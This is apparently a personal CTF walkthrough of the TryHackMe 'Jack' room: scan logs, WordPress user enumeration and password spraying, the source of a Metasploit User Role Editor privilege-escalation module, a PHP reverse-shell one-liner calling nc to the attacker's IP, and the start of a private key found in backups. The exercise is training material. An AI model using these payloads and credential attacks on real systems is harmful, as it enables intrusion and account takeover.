Jack

222

Deploy & Root

Start Machine

Connect to our network and deploy this machine.

Add jack.thm to /etc/hosts

Answer the questions below

┌──(kali㉿kali)-[~]
└─$ rustscan -a 10.10.73.143 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.73.143:22
Open 10.10.73.143:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 12:15 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 12:15
Completed Parallel DNS resolution of 1 host. at 12:15, 0.03s elapsed
DNS resolution of 1 IPs took 0.09s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 12:15
Scanning 10.10.73.143 [2 ports]
Discovered open port 80/tcp on 10.10.73.143
Discovered open port 22/tcp on 10.10.73.143
Completed Connect Scan at 12:15, 0.21s elapsed (2 total ports)
Initiating Service scan at 12:15
Scanning 2 services on 10.10.73.143
Completed Service scan at 12:15, 6.57s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.73.143.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:15
Completed NSE at 12:15, 8.99s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:15
Completed NSE at 12:15, 1.27s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Nmap scan report for 10.10.73.143
Host is up, received user-set (0.21s latency).
Scanned at 2023-01-18 12:15:16 EST for 17s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3e7978089331d0837fe2bcb614bf5d9b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDgHGMuutSoQktLWJfDa8F4+zCvINuPv8+mL2sHPJmSfFDaQ3jlsxitYWH7FWdj3zPzXLW01aY+AySXW593T3XZpzCSAjm3ImnPtNTaQsbsdkgmhj8eZ3q9hPxU5UD5593K+/FDdIiN5xIBLegm6y0SAd3sRtpdrcpHpkqOIZvoCyJTV7ncbRY0gppvfTEObo2PiCtzh31gbaDPrJICPnDuuF5aWAUTeUMc0YcMYaB9cCvfVT6Y1Cdfh4IwMHslafXRhRt5tn5l47xR0xwd3cddUEez/CHxiNthNTgv+BSo+TPPciPAiCN3QGSqTcPQ74RvFiAznL2irkENq+Qws2A3
|   256 3a679faf7e66fae3f8c754496338a293 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLzJknVQsubSrZMKNLlNAP1HXXuXzhtAf24ScY17eIS03NfxjFwiSESz8xKwVcmbODQGc+b9PvepngTTGlVrMf4=
|   256 8cef55b023732c14094522ac84cb40d2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG/WxvJRsI0dvT84mxR/y3AH3C8KP/1Njv4wP6DylZeQ
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-generator: WordPress 5.3.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.92 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts      
[sudo] password for kali: 
                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ tail /etc/hosts
10.10.20.190 windcorp.thm
10.10.148.212 fire.windcorp.thm
10.10.85.102 selfservice.windcorp.thm
10.10.85.102 selfservice.dev.windcorp.thm
10.10.167.117 team.thm
10.10.167.117 dev.team.thm
10.10.29.100 set.windcorp.thm
10.10.20.190 Osiris.windcorp.thm Osiris osiris.windcorp.thm
10.10.37.31  UNATCO
10.10.73.143 jack.thm

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://jack.thm -e ap
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://jack.thm/ [10.10.73.143]
[+] Started: Wed Jan 18 12:19:20 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Jan 18 12:19:48 2023
[+] Requests Done: 40
[+] Cached Requests: 7
[+] Data Sent: 8.662 KB
[+] Data Received: 12.343 MB
[+] Memory used: 234.227 MB
[+] Elapsed time: 00:00:28

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://jack.thm -e u 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.73.143]
[+] Started: Wed Jan 18 12:20:23 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <============================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] jack
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://jack.thm/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wendy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] danny
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Jan 18 12:20:38 2023
[+] Requests Done: 30
[+] Cached Requests: 38
[+] Data Sent: 7.527 KB
[+] Data Received: 230.207 KB
[+] Memory used: 197.637 MB
[+] Elapsed time: 00:00:14

jack, wendy, danny

┌──(kali㉿kali)-[~]
└─$ cat users_jack 
jack
wendy
danny

https://raw.githubusercontent.com/drtychai/wordlists/master/fasttrack.txt

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://jack.thm -U users_jack -P /usr/share/wordlists/fasttrack.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.73.143]
[+] Started: Wed Jan 18 12:35:19 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:10 <===========================================================> (137 / 137) 100.00% Time: 00:00:10

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - wendy / changelater                                                                                                           
Trying danny / starwars Time: 00:01:17 <==============================================                 > (646 / 868) 74.42%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: wendy, Password: changelater

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Jan 18 12:37:11 2023
[+] Requests Done: 818
[+] Cached Requests: 7
[+] Data Sent: 371.288 KB
[+] Data Received: 610.033 KB
[+] Memory used: 252.492 MB
[+] Elapsed time: 00:01:52

wendy: changelater

jack.thm/wp-admin

----
using terminator (shortcuts)

ctrl + shift+ d (open vertically / derecha)
ctrl + shift + a (open horizontally / abajo)
ctrl + shift + w (close terminal)
ctrl + shift + tab (move previous terminal)
ctrl + tab (move next terminal)
windows + arrow up (expand terminal)
ctrl + shift + left arrow, right arrow, down arrow, up arrow (adjust terminal)
ctrl + shift + t (open a new tab)
ctrl + shift + i (open a new terminal)


---

┌──(kali㉿kali)-[~]
└─$ searchsploit wordpress role privilege
---------------------------------------------------- ---------------------------------
 Exploit Title                                      |  Path
---------------------------------------------------- ---------------------------------
WordPress Plugin User Role Editor < 4.25 - Privileg | php/webapps/44595.rb
---------------------------------------------------- ---------------------------------
Shellcodes: No Results


┌──(kali㉿kali)-[~]
└─$ searchsploit -m php/webapps/44595.rb 
  Exploit: WordPress Plugin User Role Editor < 4.25 - Privilege Escalation
      URL: https://www.exploit-db.com/exploits/44595
     Path: /usr/share/exploitdb/exploits/php/webapps/44595.rb
    Codes: N/A
 Verified: False
File Type: Ruby script, ASCII text, with very long lines (987)
Copied to: /home/kali/44595.rb


                                                                                      
┌──(kali㉿kali)-[~]
└─$ cat 44595.rb     
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress User Role Editor Plugin Privilege Escalation',
      'Description'     => %q{
        The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
        check within its update user profile functionality ("update" function, contained
        within the "class-user-other-roles.php" module).
        Instead of verifying whether the current user has the right to edit other users'
        profiles ("edit_users" WP capability), the vulnerable function verifies whether the
        current user has the rights to edit the user ("edit_user" WP function) specified by
        the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
        user id is the current user's id, this check is always bypassed (i.e. the current
        user is always allowed to modify its profile).
        This vulnerability allows an authenticated user to add arbitrary User Role Editor
        roles to its profile, by specifying them via the "ure_other_roles" parameter within
        the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
        clicked).
        By default, this module grants the specified WP user all administrative privileges,
        existing within the context of the User Role Editor plugin.
      },
      'Author'          =>
        [
          'ethicalhack3r',    # Vulnerability discovery
          'Tomislav Paskalev' # Exploit development, metasploit module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          ['WPVDB', '8432'],
          ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
	],
      'DisclosureDate'  => 'Apr 05 2016',
    ))

    register_options(
      [
        OptString.new('TARGETURI',   [true, 'URI path to WordPress', '/']),
        OptString.new('ADMINPATH',   [true, 'wp-admin directory', 'wp-admin/']),
        OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
        OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
        OptString.new('PLUGINPATH',  [true, 'User Role Editor directory', 'user-role-editor/']),
        OptString.new('USERNAME',    [true, 'WordPress username']),
        OptString.new('PASSWORD',    [true, 'WordPress password']),
	OptString.new('PRIVILEGES',  [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_published_posts,edit_dashboard,edit_others_pages,edit_others_posts,edit_pages,edit_posts,edit_private_pages,edit_private_posts,edit_published_pages,edit_published_posts,edit_theme_options,export,import,list_users,manage_categories,manage_links,manage_options,moderate_comments,promote_users,publish_pages,publish_posts,read_private_pages,read_private_posts,read,remove_users,switch_themes,upload_files,customize,delete_site,create_users,delete_plugins,delete_themes,delete_users,edit_plugins,edit_themes,edit_users,install_plugins,install_themes,unfiltered_html,unfiltered_upload,update_core,update_plugins,update_themes,ure_create_capabilities,ure_create_roles,ure_delete_capabilities,ure_delete_roles,ure_edit_roles,ure_manage_options,ure_reset_roles'])
      ])
  end

  # Detect the vulnerable plugin by enumerating its readme.txt file
  def check
    readmes = ['readme.txt', 'Readme.txt', 'README.txt']

    res = nil
    readmes.each do |readme_name|
      readme_url = normalize_uri(target_uri.path, datastore['CONTENTPATH'], datastore['PLUGINSPATH'], datastore['PLUGINPATH'], readme_name)
      vprint_status("Checking #{readme_url}")
      res = send_request_cgi(
        'uri'    => readme_url,
        'method' => 'GET'
      )
      break if res && res.code == 200
    end

    if res.nil? || res.code != 200
      # The readme.txt file does not exist
      return Msf::Exploit::CheckCode::Unknown
    end

    version_res = extract_and_check_version(res.body.to_s, :readme, 'plugin', '4.25', nil)
    return version_res
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  # Search for specified data within the provided HTTP response
  def check_response(res, name, regex)
    res.body =~ regex
    result = $1
    if result
      print_good("#{peer} - WordPress - Getting data   - #{name}")
    else
      vprint_error("#{peer} #{res.body}")
      fail_with("#{peer} - WordPress - Getting data   - Failed (#{name})")
    end
    return result
  end

  # Run the exploit
  def run
    # Check if the specified target is running WordPress
    fail_with("#{peer} - WordPress - Not Found") unless wordpress_and_online?

    # Authenticate to WordPress
    print_status("#{peer} - WordPress - Authentication - #{username}:#{password}")
    cookie = wordpress_login(username, password)
    fail_with("#{peer} - WordPress - Authentication - Failed") if cookie.nil?
    store_valid_credential(user: username, private: password, proof: cookie)
    print_good("#{peer} - WordPress - Authentication - OK")

    # Get additional information from WordPress, required for the HTTP POST request (anti-CSRF tokens, user parameters)
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - WordPress - Getting data   - #{url}")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => url,
      'cookie'   => cookie
    })

    if res and res.code == 200
      wp_nonce     = check_response(res, "_wpnonce",     /name=\"_wpnonce\" value=\"(.+?(?=\"))\"/)
      color_nonce  = check_response(res, "color-nonce",  /name=\"color-nonce\" value=\"(.+?(?=\"))\"/)
      checkuser_id = check_response(res, "checkuser_id", /name=\"checkuser_id\" value=\"(.+?(?=\"))\"/)
      nickname     = check_response(res, "nickname",     /name=\"nickname\" id=\"nickname\" value=\"(.+?(?=\"))\"/)
      display_name = check_response(res, "display_name", /name=\"display_name\" id=\"display_name\"\>[\s]+\<option  selected=\'selected\'\>(.+?(?=\<))\</)
      email        = check_response(res, "email",        /name=\"email\" id=\"email\" value=\"(.+?(?=\"))\"/)
      user_id      = check_response(res, "user_id",      /name=\"user_id\" id=\"user_id\" value=\"(.+?(?=\"))\"/)
    else
      fail_with("#{peer} - WordPress - Getting data   - Server response (code #{res.code})")
    end

    # Send HTTP POST request - update the specified user's privileges
    print_status("#{peer} - WordPress - Changing privs - #{username}")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => url,
      'vars_post' => {
        '_wpnonce'         => wp_nonce,
        '_wp_http_referer' => URI::encode(url),
        'from'             => 'profile',
        'checkuser_id'     => checkuser_id,
        'color-nonce'      => color_nonce,
        'admin_color'      => 'fresh',
        'admin_bar_front'  => '1',
        'first_name'       => '',
        'last_name'        => '',
        'nickname'         => nickname,
        'display_name'     => display_name,
        'email'            => email,
        'url'              => '',
        'description'      => '',
        'pass1'            => '',
        'pass2'            => '',
        'ure_other_roles'  => datastore['PRIVILEGES'],
        'action'           => 'update',
        'user_id'          => user_id,
        'submit'           => 'Update+Profile'
      },
      'cookie'    => cookie
    })

    # check outcome
    if res and res.code == 302
      print_good("#{peer} - WordPress - Changing privs - OK")
    else
      fail_with("#{peer} - WordPress - Changing privs - Server response (code #{res.code})")
    end
  end
end

# EoF   

go to profile and press update profile then use burp
&ure_other_roles=administrator

pass2=&ure_other_roles=administrator&action=update

go to editor plugin
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.8.19.103 1337 >/tmp/f")?>
then
activate akismet plugin 

┌──(kali㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1337                                     
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.73.143.
Ncat: Connection from 10.10.73.143:38888.
bash: cannot set terminal process group (1184): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jack:/var/www/html/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash")'
</wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash")'                   
www-data@jack:/var/www/html/wp-admin$ 
zsh: suspended  rlwrap nc -lvnp 1337
                                                                                                      
┌──(kali㉿kali)-[~/Downloads]
└─$ stty raw -echo; fg        
[1]  + continued  rlwrap nc -lvnp 1337
www-data@jack:/var/www/html/wp-admin$ export TERM=xterm256-color
export TERM=xterm256-color
www-data@jack:/var/www/html/wp-admin$ cd /home
cd /home
www-data@jack:/home$ ls
ls
jack
www-data@jack:/home$ cd jack
cd jack
www-data@jack:/home/jack$ ls -lah
ls -lah
total 36K
drwxr-xr-x 4 jack jack 4.0K Jan 10  2020 .
drwxr-xr-x 3 root root 4.0K Jan  8  2020 ..
lrwxrwxrwx 1 jack jack    9 Jan 10  2020 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack  220 Jan  8  2020 .bash_logout
-rw-r--r-- 1 jack jack 3.7K Jan  8  2020 .bashrc
drwx------ 2 jack jack 4.0K Jan  9  2020 .cache
-rw-r--r-- 1 jack jack  655 Jan  8  2020 .profile
drwx------ 2 jack jack 4.0K Jan 10  2020 .ssh
-rw-r--r-- 1 root root  140 Jan 10  2020 reminder.txt
-rw-rw-r-- 1 jack jack   33 Jan 10  2020 user.txt
www-data@jack:/home/jack$ cat user.txt
cat user.txt
0052f7829e48752f2e7bf50f1231548a

www-data@jack:/home/jack$ cat reminder.txt
cat reminder.txt

Please read the memo on linux file permissions, last time your backups almost got us hacked! Jack will hear about this when he gets back.

www-data@jack:/home/jack$ cd .ssh
cd .ssh
bash: cd: .ssh: Permission denied

www-data@jack:/home/jack$ locate backups
locate backups
/var/backups
/var/backups/alternatives.tar.0
/var/backups/apt.extended_states.0
/var/backups/apt.extended_states.1.gz
/var/backups/dpkg.arch.0
/var/backups/dpkg.arch.1.gz
/var/backups/dpkg.diversions.0
/var/backups/dpkg.diversions.1.gz
/var/backups/dpkg.statoverride.0
/var/backups/dpkg.statoverride.1.gz
/var/backups/dpkg.status.0
/var/backups/dpkg.status.1.gz
/var/backups/group.bak
/var/backups/gshadow.bak
/var/backups/passwd.bak
/var/backups/shadow.bak
www-data@jack:/home/jack$ cd /var/backups
cd /var/backups
www-data@jack:/var/backups$ ls
ls
alternatives.tar.0	  dpkg.diversions.1.gz	  gshadow.bak
apt.extended_states.0	  dpkg.statoverride.0	  id_rsa
apt.extended_states.1.gz  dpkg.statoverride.1.gz  passwd.bak
dpkg.arch.0		  dpkg.status.0		  shadow.bak
dpkg.arch.1.gz		  dpkg.status.1.gz
dpkg.diversions.0	  group.bak
www-data@jack:/var/backups$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
